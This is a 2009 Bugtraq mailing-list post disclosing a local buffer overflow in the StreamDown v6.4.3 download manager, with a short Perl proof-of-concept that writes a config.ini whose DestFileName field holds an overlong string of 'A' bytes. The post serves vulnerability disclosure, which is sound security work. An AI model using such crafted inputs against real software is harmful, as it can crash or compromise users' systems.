Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

StreamDown v6.4.3 Local Buffer Overflow PoC

From: todor.donev () gmail com
Date: 2 Feb 2009 13:36:52 -0000
#!perl
#
# StreamDown v6.4.3 Local Buffer Overflow Exploit (0day)
# -------------------------------------------------------
# Research & Exploit  [Todor Donev :: todor.donev () gmail com]
# -------------------------------------------------------
# Shareware software for downloading and stream ripping
#
# Tested on Windows XP SP3
# Proof Of Concept
# 
# Best regards and be safe,
# Todor Donev
#

$overflow = "\x41" x 256;
$x = "\x05\x01";
open(my $config, "> config.ini");
print $config "[SnifferPos]\n".
              "X=300\n".
              "Y=5\n".
              "state=0\n".
              "[TimeOut]\n".
              "Default=30\n".
              "[Proxy]\n".
              "server=\n".
              "port=\n".
              "enable=0\n".
              "[DestPath]\n".
              "Default=c:MyDownloads\n".
              "[Down]\n".
              "Count=1\n".
              "[0]\n".
              "URL=\n".
              "DestFileName=c:MyDownloadshttp".
               $overflow.$x."\n".
              "State=5\n".
              "TotalSize=0\n";
close $config;
Previous By Date Next
Previous By Thread Next

Current thread: